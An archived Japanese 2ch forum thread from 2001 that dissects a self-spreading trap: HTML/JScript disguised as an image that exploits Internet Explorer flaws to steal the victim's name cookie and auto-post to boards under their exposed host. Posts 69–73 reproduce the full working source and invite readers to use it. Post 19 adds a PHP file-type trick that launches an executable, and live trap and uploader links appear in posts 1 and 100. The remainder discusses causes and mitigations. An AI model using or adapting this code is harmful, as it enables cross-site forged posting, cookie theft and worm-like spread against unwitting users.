5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

fusianasanトラップになんらかの対処を

1 :名無しさん@お腹いっぱい。:01/12/17 18:25
リンク先の画像を見ただけでスレにて勝手にfusianasanされてしまうというトラップが蔓延してるようです。
私が知る限りでは海外サッカー板などで猛威をふるってるようです。
なんらかの対処が必要ではないでしょうか。

以下がそのトラップのリンクです。
ttp://www2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/15.gif
実験以外の目的ではくれぐれも踏まないようにお願いします。
もし踏んだ場合、ウィルスのように同じリンクがスレに増殖してしまうので、以降の利用者のためにこの注意文をコピペするなどして注意を喚起するようにしてください。

2 :名無しさん@お腹いっぱい。:01/12/17 18:27
ブラクラにProxomitronで対抗するスレ
http://pc.2ch.net/test/read.cgi/software/998274524/

3 :名無しさん@お腹いっぱい。:01/12/17 18:31
半角がすごいことになってるYO!

4 :名無しさん@お腹いっぱい。:01/12/17 18:47
ニュー速で20個くらいこれが原因の同名スレが並んでる。

5 :名無しさん@お腹いっぱい。:01/12/17 18:58
半角死んだな。

6 :名無しさん@お腹いっぱい。:01/12/17 19:02
スマソ
厨房なんでよく分からんのだが
踏むと、自分の知らないうちにレスをするの?
スレを建てるの?

7 :名無しさん@お腹いっぱい。:01/12/17 19:06
>>6
多分、観測にはここら辺が良いかと思う。
http://news.2ch.net/test/read.cgi/newsplus/1008578204/

8 :名無しさん@お腹いっぱい。:01/12/17 19:19
これ DL したけど、0 としか入ってない
どういう仕掛けになっとんねん?

9 :名無しさん@お腹いっぱい。:01/12/17 19:48
>>8
すでに消された模様

10 :名無しさん@お腹いっぱい。:01/12/17 19:49
ソースのぞいたら、こんなのがでてきたんだが・・・
http://www.interq.or.jp/www1/marimo/gallery/cg/top06big.jpg

11 :名無しさん@お腹いっぱい。:01/12/17 19:51
気の小さいやつは見ない方がいいぞ。

12 :ごめんね:01/12/17 19:56
半角板ってどこにあるのか知りたいんですが。見つかんね。

13 :ごめんね:01/12/17 19:58
と思ったらあった・・メガネかけて逝ってきます。

14 :__:01/12/17 20:12
半角板は今『小学生の○んこ画像!』祭り。

15 :#:01/12/17 20:43
半角板でイパーイ2ゲットできるYO。
2ゲット祭。

16 :8:01/12/17 20:53
>>9
ここで手に入った
ttp://www2.makani.to/akutoku/upload/dat/1008583360.gif

17 ::01/12/17 21:56
これらしいが?
http://www.forest.impress.co.jp/article/2001/12/17/iesecuritypatch.html

18 ::01/12/17 22:19
半角板が嵐のようだw

19 :>17  水泥棒!「「菊池記念館」」:01/12/17 22:32
<?php
Header("Content-type: application/ms-word");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>

readme.doc という名前にして AddType application/x-httpd-php .doc として IE 6
(MS01-058 patch なし) で試すと、「次のファイルをダウンロードしています - readme.doc - ファイルを開くか、
ファイルをコンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、 calc.exe がいきなり実行されてしまう。
これで IE 6 も IE 5.5 と同程度に危険ということに。 patch ありではちゃんと「calc.exe」になる。もっとも、Office がインストールされていない環境とか、
Office の open 時のデフォルトの挙動の設定とかにも依存するのだろう。 (きっと「デフォルト = open」が影響しているに違いない)

20 :名無しさん@お腹いっぱい。:01/12/17 22:38
同名スレッドの建立を一定時間規制すりゃいいじゃないの。

21 ::01/12/17 22:41
>>19
すまん。違ったようだ。

22 : :01/12/17 22:48
これってどういうロジックになってんの?

23 : :01/12/17 22:48
現在氏亡のスレ
半角板 http://www2.bbspink.com/ascii/index.html
厨房板 http://tmp.2ch.net/kitchen/

今夜でどれだけお亡くなりになるんだろう・・・

24 :名無しさん@お腹いっぱい。:01/12/17 22:52
キト、引っ張ってくる画像ファイルん中に答え書いてあるねん。
なんでjpgん中にスクリプトかいてあるのん(w

25 :名無しさん@お腹いっぱい。:01/12/17 22:55
パチ板もお祭りだよ!

26 :名無しさん@お腹いっぱい。:01/12/17 22:56
とりあえずソースから追っかけて、投稿スクリプト走らせてるサイト
潰しに掛かればいいぢゃん。
というか、其処からの投稿規制掛ければいいのか。
何箇所有るんだ??

27 : :01/12/17 23:00
アイドル板もお亡くなり
http://www2.bbspink.com/girls/index.html
誰か何とかしてくれYO

28 :名無しさん@お腹いっぱい。:01/12/17 23:01
凡そ一時間位前、6カ所程。
外部アプロダに貼られていた模様。

29 :名無しさん@お腹いっぱい。:01/12/17 23:04
いろんなバージョンが出回っているようだな

30 :名無しさん@お腹いっぱい。:01/12/17 23:10
プロクソオミトロン使えよ

31 :名無しさん@お腹いっぱい。:01/12/17 23:53
これ踏むと自分のPCになんか影響は出るわけ?

32 :名無しさん@お腹いっぱい。:01/12/18 00:04
厨房すごかった。
全スレの8割くらいがこいつだった。

33 :名無しさん@お腹いっぱい。:01/12/18 00:07
>>30
防御してもスレッドが建てられ、しなかったら節穴になるのであまり効果はないな。

34 :名無しさん@お腹いっぱい。:01/12/18 00:15
オミトロンでも駄目なのか?

35 :名無しさん@お腹いっぱい。:01/12/18 00:15
オミトロンでイメージチェッカーフィルター入れても駄目か?

36 :名無しさん@お腹いっぱい。:01/12/18 00:38
デフォルトのままだとあまり効果的でない。
弄れ。

37 :テコキ君:01/12/18 01:25
直リンは
右クリでデスクトプにでも一旦保存して.txtにしてソース見る。
色々フシアナさんで楽しいよ(w

ダメだよ。シビレフグなんて器具使っちゃ。。
イムポになちゃうよ。。

38 :名無しさん@お腹いっぱい。:01/12/18 02:16
このトラップ
トロイの仕込まれているリンク先が関係あるのか?

39 :名無しさん@お腹いっぱい。:01/12/18 02:35
もう逃げちまってる。。。.jpgにソース入れてあるよん。
本体.txtにすると、、、、
#前略
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;

if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}

#こやって書きコねん。

<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
#一番下にこれ有ったけど。。。何?(w

40 :名無しさん@お腹いっぱい。:01/12/18 02:52
       ∧_∧
  ぷ | (; ´Д` )ガーン
 \ぅ | /    \
   \ / /|    |ヽヽ
  __| | .|    | | |__
  \   ̄ ̄ ̄ ̄ ̄   \
  ||\            \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||              ||

41 :名無しさん@お腹いっぱい。:01/12/18 03:13
MS Java Script だけで2ch荒らすとは、お見事!
最近はやったW32.Badtransウイルスとかと同じようなバグを使っているのねん(TT
HTMLをContent-Type: image/gifと偽装すると、IEが食ってHTML内部のScript
を実行… Content-Typeや拡張子は関係なく、ファイルの中身で判断してバカIE
が開くみたいですね…

42 :名無しさん@お腹いっぱい。:01/12/18 03:21
>>41
んで、ぢゃばの確認窓は回避と。。
ちびっとまづいね。。。
アイデア次第で応用利くし。。

43 :名無しさん@お腹いっぱい。:01/12/18 03:30
これMSは対策しないとまずいのでは・・・。

44 :名無しさん@お腹いっぱい。:01/12/18 04:14
Scriptだけで書き込みできてしまうって言うのはまずいでしょうね…
しかもHTML置いてあるのとは違うドメインにカキコですし。
同一ドメインのサブディレクトリー内にデーター送信の機能とかなら
まだ便利に使えるって言うのはあるかもしれないけど…

45 :名無しさん@お腹いっぱい。:01/12/18 17:31
>>41
違います。Content-Typeは関係ない。
これをtext/htmlとして保存しても走る。

46 :名無しさん@お腹いっぱい。:01/12/19 00:32
>>45
Content-Type: text/htmlをHTMLとして開くのは正常ですね。
問題なのはimage/とかをHTMLとして開く問題、text/plainでもHTMLとして開くらしいし
fusianasanトラップとかW32.BadtransとかはContent-Typeの無視が問題ですから、
W32.Badtransはシェルが拡張子で判断するのに、IEがContent-Typeだけ見て渡す問題、
fusianasanトラップをディスクトップ上に、*.gifで保存してIEで開いた場合はなぜか、
IEに拡張子の情報が送られそれで判断されてGIFとして開こうとする。
(IE5.5SP1、実際にfusianasanトラップの動くもので確認)
とりあえずその辺の判断の矛盾を突いているわけですね。

47 :テコキ君:01/12/19 00:56
まぁ、画像板、アプロダ板も要注意って訳だ。
スクリプトチェク回避とは、、、TIME2恐るべし。
漏れはcontent-Tipeのアプリでの認識なんて信用してないから、
常にあやしいファイルはtxtにしてノートパッドで開いてソース見るし。
テキスト書くだけの機能しかないから安心(w
欲張り機能拡張アプリは危ない。。。

48 :もしかしたら、 max4-19.net0726.ne.jpトラップは未発見ホール?:01/12/19 02:10
この場合の問題は、URI上のファイル名の拡張子で、人間が判断、
問題なかろうとリンクをクリックして起きる問題。
サーバーはファイルの拡張子でContent-Type: ヘッダーを付ける訳で
(拡張子が分からない場合はファイル内部を見るみたい、
 apachの設定ファイルを参照、mime.types, magic)
アプリケーションはそれに従うであろうと言う、ある程度インターネッ
トのプロトコルを知っている人間の方が陥りやすいのかも…
(真の素人は画像ファイルを開くのも危ないと判断するか分からないか)
W32.Badtransとかの場合はシェルに送るときの問題で、それだけしか
治していないのであれば、
IE内で処理される種類のContent-Typeの矛盾は治していないのかも…
今*.exeを.gifにして開くとtextとして開かれるました。

このタイプのセキュリティーホールはもうあったのでしょうか?

49 :めちゃバカ:01/12/19 02:11
(^^;;

50 :名無しさん@お腹いっぱい。:01/12/19 02:15
禿藁タ

51 :祝!2ch初セキュリティーホール:01/12/19 17:19
IE6 Q313675 にしたけど、fusianasanトラップは直っていませんね、

ということで、fsianasanトラップは未発見!!!!!

52 :祝!2ch発セキュリティーホール:01/12/19 17:22
まちがえた、「祝!2ch発セキュリティーホール」だよ

53 :はじめまして ◆ufliC56E :01/12/19 17:49
http://pc.2ch.net/test/bbs.cgi?MESSAGE=いたづらカキコ&bbs=sec&key=1008581128&time=1008751234
こんなのを他サーバにUPして拡張子偽ってるということでよろしいのでしょうか。

54 :名無しさん@お腹いっぱい。:01/12/19 17:52
48
ワロタ

55 :名無しさん@お腹いっぱい。:01/12/19 18:11
>>52
名前を赤にしたり、フォントサイズ変えたり、画像埋め込んだりって
やつは直ってたのか

56 :fusianasam:01/12/19 18:17
>>48
マジ腹イタイッス・・・

57 :名無しさん@お腹いっぱい。:01/12/19 19:08
>>44
その点で考えるとブラウザというよりは2chのCGIスクリプトの脆弱性なのでは?
ブラウザのレベルで他ドメインへのアクセスを禁止したら
自サイトにYahooの検索窓とか置けなくなるじゃん?

この問題、他ドメインからのfusianasan書き込みという2ちゃんねるの問題と、
偽造ヘッダによるIEの解釈の問題の2つに分けられると思うのですが。
2ちゃんねる的には偽造ヘッダ問題が完結しても、
拡張子htmlでfusianasan書き込みするようなスクリプトが書かれているページ
にリンク貼られたら同じだし、
2ちゃんねる以外でもfusianasan機能をもつコードをjpgとか偽って貼られたら
被害出るだろうし。
つーかこれみなさんの脳内で既出ですか?

58 :祝!2ch発セキュリティーホール:01/12/19 21:02
>>57
>ブラウザのレベルで他ドメインへのアクセスを禁止したら
>自サイトにYahooの検索窓とか置けなくなるじゃん?

ん〜、ドメイン間のデータ受け渡しを切り離せれば問題ないわけですよ。
Yahooの検索窓であればそれと同居しているフレームとかの情報は必要
ないわけですから。同居ではなくてフレームを見えなくすることも可能
なわけで、そのままクラッカーサイトから他のサイトを見に行ってしま
うと、例えばIEのJavaScriptならHTMLのソースをすべてとれてしまう
隠しプロパティーあるし、Cookieやフォーム上の内容、そのページの
リンクもとページのURI、?以降のクエリーがあればそれも読める、
JavaScriptなどの変数とかの内容にもアクセスできるだろうし、
それで得た情報をPOSTしたりURIとして送信できたら問題でしょ?
これをフレーム間の脆弱性とか言うわけで。
基本的にドメインとパスの違う情報にアクセスできたらまずいわけで、
Cookieがよそのドメインやパスから読めたらまずいのと同じ訳。
設定をちゃんとしたらフレームが違うドメインをまたいでいる場合
警告ダイアログとか出せるようになります。
設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w
fusianasanトラップの場合はIE6で最新のパッチあてていても、
*.gifとかをHTMLとして実行してしまう、とりあえず画像のURLを
クリックして想像外のサイトに、飛ばされるのは充分セキュリティー
ホール、ファイルが置いてあるサーバー側で飛ばしているのではなく、
そのファイルを置いたものの意思でそう言うことができるのであれば。
それがHTMLファイルとしてのURLならクリックしたものの不注意として
考えられるが。(MSのHTMLにできない事ってないス(w)半分冗談だけど)

59 :祝!2ch発セキュリティーホール:01/12/19 21:35
>設定した上で1ch.tv見に逝くとよろしい、警告とか出るでアルよ(w

http://www.1ch.tv/ から見に行って、左フレームのメニューを
クリックするとだった… 「ドメインの違うサブフレーム間の移動…」
と言う警告がだせる。

60 :名無しさん@お腹いっぱい。:01/12/20 18:13
>つーかこれみなさんの脳内で既出ですか?

がいしゅつ!!!

61 :57:01/12/20 21:42
>>58
よくわかりました。ありがとうございます。
57は今見るとよく理解しないまま知ったかぶった発言でした。
しばらくそれを踏まえてレス読み直してみます。

62 :名無しさん:01/12/20 23:52
>>61
素晴らしいコント見させて頂きました
ありがとう

63 :名無しさん@お腹いっぱい。:01/12/21 01:02
ちなみに、>>39
<xml:namespace prefix=t />
以下は
IEでスクリプトをオフにしていても、強制的にスクリプトを実行させるようにする記述です。
仕様らしいです

64 :名無しさん@お腹いっぱい。:01/12/21 01:07
>>61
怪しいサイトを見に行ったあととか、セキュリティー的に漏れたら困る所を見に
行くときは、ウインドウを閉じてからにすると少しは安全。

65 :名無しさん@お腹いっぱい。:01/12/21 01:14
>>63
どこの部分でPOSTとかGETの実行(切っ掛け)しているんでしょ?
ユーザーがボタンとか押した切っ掛けがないと投稿できないと思っていました。
(Script類だけでそこまでできたらどう考えてもヤバイよね…)
それとPOSTで投稿することまでできているんでしょうか?
あそこまでいろいろやっていると、余程詳しい人でないと全部は分かりません。

66 :名無しさん@お腹いっぱい。:01/12/21 01:17
Netscape6.2.1は大丈夫みたいですね。
動かないみたいです。

67 :  :01/12/21 01:26
>>65
ちゃんと読めばわかるよ。
きっかけはページの読み込み。
OnloadでJScriptが実行されて、
FORM内にあるSubmit ButtonがClickされる。

68 :39:01/12/21 01:27
ドーデも良いが、IISにこれ置いた場合は再現できるんか??
>jpg(ぢつはhtmlとして開く)
apacheは簡単に手元で実験できるけど。IIS手元に無い。
>>63
TIME2という技術の仕様らしい。要望板でカキコ有った。
こっちの方が怖い。virに応用簡単。
実装早すぎたんでないの??
マイ糞.NET構想、勇み足な気が。。

69 :39:01/12/21 01:43
良いよ。手元に有る奴ソース張っとく。活用しちクリ(w
書いた奴が悪い。。晒す。
#xx.xxx.txt
<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http‘探して辿ったら良かれポンチのグロ画像‘.png"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http.‘同上‘png" id=img1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>
<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

70 :つづき:01/12/21 01:44
var NAME='';
var TAR='';

function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';
f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Welcome to 裏2ちゃんねる!';
}
var ura2=false;

if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){
f1.MESSAGE.value='guest guest\nWelcome to 裏2ちゃんねる!\n'+parent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

71 :つづき:01/12/21 01:45
function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){
t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}

main();

function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';
t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implementation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}

function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}

function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[1])}}
return '';
}

72 :後は御勝手に:01/12/21 01:46
</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>

73 :忘れた:01/12/21 01:52
おっと>71-72に
コレ挿入
function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');
a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

74 :名無しさん@お腹いっぱい。:01/12/21 02:13
>>46
だからIEがMIMEタイプを無視する問題は
今回のfusianasanバグと直接は関係ないと言ってるんだが。
41じゃあたかもMIMEタイプバグを衝いて起動しないはずの
スクリプトを起動してるかのように読める。
そうじゃないと言ってるの。
問題の切り分けくらいちゃんとしようよ。

75 :74:01/12/21 02:16
まだわかりにくいか。
「text/html として送られてきたなら本来起動しないはずの
スクリプトを起動させるバグを利用しているかのように読め
るが、強制的にスクリプトを起動させる手法は違うもの」
と言いたいの。

76 :65:01/12/21 02:21
>>67
>ちゃんと読めばわかるよ。
>FORM内にあるSubmit ButtonがClickされる。

どもありがとう、ちゃんと読んでいませんでした(^^;
意外と原始的な方法でやっているのですね。
f1.submit.click();
submidボタンは押せないようにしてほしいですよね…
submidボタンを押していると言うことはちゃんとPOSTで送っているのだろうから、
クエリーさえその掲示板に合わせておけばいいから、どんな掲示板でも防御でき
ないですね、上手くやれば普及している掲示板を判定して掲示板づたいに増殖する
ウイルスなんて作れるのではないかな? 人間がURLをクリックすると言うことが
必要ではあるけど、上手くやればまず誰かがクリックする。

77 :名無しさん@お腹いっぱい。:01/12/21 02:43
>>75
text/html として送られてきたなら本来起動しないはずのスクリプトを起動させるバグ
と言うのなら理解できるのですが、もしかして、*.htmlになっていてtext/htmlとして
送られてきたら、fusianasanトラップは動かないの?

>強制的にスクリプトを起動させる手法は違うものと言いたいの。

その辺詳しくプリーズ

78 :39:01/12/21 02:51
さて、そろそろ一人歩きするかなコレ(w
画期的なのはむしろノーチェクでスクリプト
走らす点。
別にjpg/gif偽装したのは半角板で効果出すためとも思われ。
現に、、、だし(w
各種仕様書漁ってるヤシは大したもんだ。
ネタ尽きなくて面白いねIEは。
漏れ、敬意を表して暫くは穴塞がないどいたげる(w
つか、パッチ出るの??
別に良いや、こんなもん意識のもってき方で防げるし。
・・・個人的には。(htmlでやられるとチト痛いが)
勉強に成りました>>作者さん。

79 :39:01/12/21 03:00
>>7G
つか、自分で調べろ。全部書いてあるぢょ。
こういうネタに教えてチャンは氏ね。。。

80 :名無しさん@お腹いっぱい。:01/12/21 03:10
このスレ保存版だな、とりあえず。
しかしすぐ広がりそうだな、時期も時期だし。まったく困ったもんだ。

81 :TIME2って…:01/12/21 05:14
>79
>63の<xml:namespace prefix=t />のあたりはTIMEをつかって、
「IEでスクリプトをオフにしていても、強制的にスクリプトを実行
させるようにする記述です。」
と言うことではないのか? ユーザーが設定でスクリプトを切っているときの

82 :名無しさん:01/12/21 09:28
1.text/plainだろうがimage/gifだろうが動作する。(IEが勝手にファイルを解析してHTMLとして表示させようとするため)
  →これがMIMEタイプバグ

2.>強制的にスクリプトを起動させる手法
  スクリプトONであればJavaScript標準の機能を用いて動作する
  スクリプトOFFであれば81さんの言っている通り。

83 :名無しさん@お腹いっぱい。:01/12/21 12:07
修正パッチを当てていても
アクティブ スクリプトはオフにしないといけないのでしょうか?
それとも、オフにしても危険なのでしょうか?
初心者な質問ですみません。教えて下さい。不安です。

84 :79:01/12/21 13:06
>82-83
81の言うとおり。。
82が言う1のMIMEタイプは、ローカルだと再現できんでしょ。アパッチ噛まさなきゃ。
文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。
漏れは、IISでも再現できるのか知りたい。
>text/plainだろうがimage/gifだろうがソースがhtmlならIEはhtmlとして認識。

http://teri.2ch.net/test/read.cgi/accuse/1008597418/
要望板の同名スレ。こっちの799以降の方が詳しい。

85 :名無しさん:01/12/21 13:15
>>83
アクティブスクリプトはOFFにしたほうがよいそうです。
(修正パッチはfusianasanトラップには対応していない)
不安でしたら「レベルのカスタマイズ」で全て安全な方向に設定しておくべきかと。
(但し見られないサイトが出てきますが…(w)

86 :ひよこ名無しさん:01/12/21 13:28
83です。
回答、どうもありがとうございました。
とりあえず、このままOFFにしておきます。

87 :名無しさん@お腹いっぱい。:01/12/21 13:29
>>85-86
しないよりはしたほうがいい、かもしれないけど、ここには・・・・
(以下ネットセキュリティ速報ページと、検証してくださった方の書き込み)
www.netsecurity.ne.jp/article/1/3616.html
memo.st.ryukoku.ac.jp/archive/200112.month/2396.html

88 :名無しさん@お腹いっぱい。:01/12/21 14:11
海外でネタにならないの祈るだけ。。。
比較的この手のネタ早耳のVIRサイトでも出てないみたいだから未だ
大丈夫とは思うけろ。。。なんとも言えないね。。。
漏れはビックリ年賀メルに平和的利用汁(w
つか、それ以上のもん組むスキルも無いけろ。。。

89 :名無しさん@お腹いっぱい。:01/12/21 14:18
上記要望板より

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default Behaviors
レジストリのここを消せばHTML+TIMEが無効になり、
元に戻せばHTML+TIMEが有効に戻ります。
http://teri.2ch.net/test/read.cgi/accuse/1008597418/873

90 :名無しさん@お腹いっぱい。:01/12/21 17:19
今こんなこと言っても仕方ないのだが、
根本的なところでは、
・何でも連携
・何でも勝手に処理
というMSの姿勢が問題なん?

この考え方、昔から気に入らないのだが。
おかげでどれくらいウィルス流行ったことか…

これを機にして、MSがIE/OEのアホな「仕様」を
見直してくれれば(・∀・)イイ!なぁと思ったり。
…無理な願いかな。

91 :81:01/12/21 18:35
>>84 :79
>文字コードの認識でもそうだけど、Apacheが便宜上勝手にヘッダ吐くのも仕方ないし。

ってなに? Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?

>漏れは、IISでも再現できるのか知りたい。

IISはContent-Type: を返さないと言うことなのか? そうでないのなら、
Content-Type: image/gifとかを返すように設定して実験したら分かるだろうが、
おれは持ってないので分からない。
Content-Type: がかえらないのなら、ファイル内容とか、URIのファイル名の拡張子で
判断するしかないが、内容で判断なら再現するし、拡張子で判断なら、ディスクトップに
置いて開くとの同じ。
さっきGET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html
と返ってきたけど… 何が言いたいのかさっぱり分からない。

92 :名無しさん@お腹いっぱい。:01/12/21 18:37
まとめてみました。
http://www2.sala.or.jp/~uuu/script/

93 :81:01/12/21 18:55
>>90
>これを機にして、MSがIE/OEのアホな「仕様」を
>見直してくれれば(・∀・)イイ!なぁと思ったり。
>…無理な願いかな。

これを機にってあんた!今まで何回あったか… またContent-Typeがらみで
パッチ出すのって恥ずかしくないんかな、そう考えるとすごいyo
やはり無理でしょう… ユーザーのセキュリティーにコストを掛けるのは
負け組企業とでも考えているのでは。
Windowsとか使っている者はMSに対して負け組なんだろうけどね

94 :81:01/12/21 19:23
httpプロトコル知らないと誤解するといけないので、こんどはinit_windows.gifで
拡張子.gifにしてIISに置いておけばいいのでは? magicみるの?
たとえ、text/htmlで返ってきても問題ないのでは? ユーザーは普通見ないし

GET /library/homepage/images/init_windows.gif HTTP/1.1
Host: www.microsoft.com

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
Connection: close
Date: Fri, 21 Dec 2001 10:03:29 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 10 Jul 2001 20:37:44 GMT
ETag: "05ce52b809c11:892"
Content-Length: 2828

GIF89a
上記行がGIFファイルの内容のmagic、上記行と合わせてこの辺がGIFのバイナリ

お絵描き掲示板とかアップローダーでどうにかするには、magicを調べると良いかもね

95 :84:01/12/21 19:33
>>91/81
>Content-Type: 返すのはべつにapach独自の仕様というわけではないのだが…?
もう良いよ。。。ヘタレな漏れの素朴な疑問だ。コレだけ解れば良い。サンクス。

>GET / HTTP/1.1 Host: www.microsoft.comしたら、
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Type: text/html

仮に、マイ糞.comが頭に/index.jpg置いててもこうなるのか知りたかっただけ。

sageでコレだけ進むとは...その方が良いけろ(w
忘れた方がシアワセな場合も有るし。

96 :84:01/12/21 20:10
>magicみるの?
この辺からそこはかとなく解ってきそう。。。サンクス。

>text/htmlで返ってきても問題ないのでは?
・・半角板ではまづいと思われ(w

97 :名無しさん@お腹いっぱい。:01/12/21 21:33
これか?
http://www.google.com/search?q=cache:Bhn0pGw6cAo:www2.sala.or.jp/~uuu/dhtml/forcescript.html+xml+namespace+time2&hl=ja&lr=lang_ja

これも。
http://www.google.com/search?q=cache:VrblljcOrYM:www2.sala.or.jp/~uuu/dhtml/forcesound.html+xml+namespace+time2&hl=ja&lr=lang_ja

強制的にサウンド再生ってことは
MediaPlayerの脆弱性を同時に突ける気がする…。

98 :90:01/12/21 21:37
>>93
やっぱり?

まぁ、毎回毎回改心してくれと思ってきたが、
そのまま今の状態まで来てるしなぁ…。

本当に、MSにはいい加減にして欲しいよ。
昔に比べればパッチは出るようになったがなぁ。
元のソフトがこんなショボいんでは
正直、使う気にならん。
小一時間(略)

99 :名無しさん@お腹いっぱい。:01/12/21 21:51
さて、Netscape6.21をメインで使用するブラウザに設定、と

100 :名無しさん@お腹いっぱい。:01/12/21 21:58

祭り板で再発一人歩きだ。。。

ttp://www.hellplant.org/cgi-bin/uploader/upload.cgi
該当アプロダカキコ。。確信犯。証拠保全。

[206.jpg]2chにすれ立てるやつ(悪用禁止)2001年12/18(火)13:48

99 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)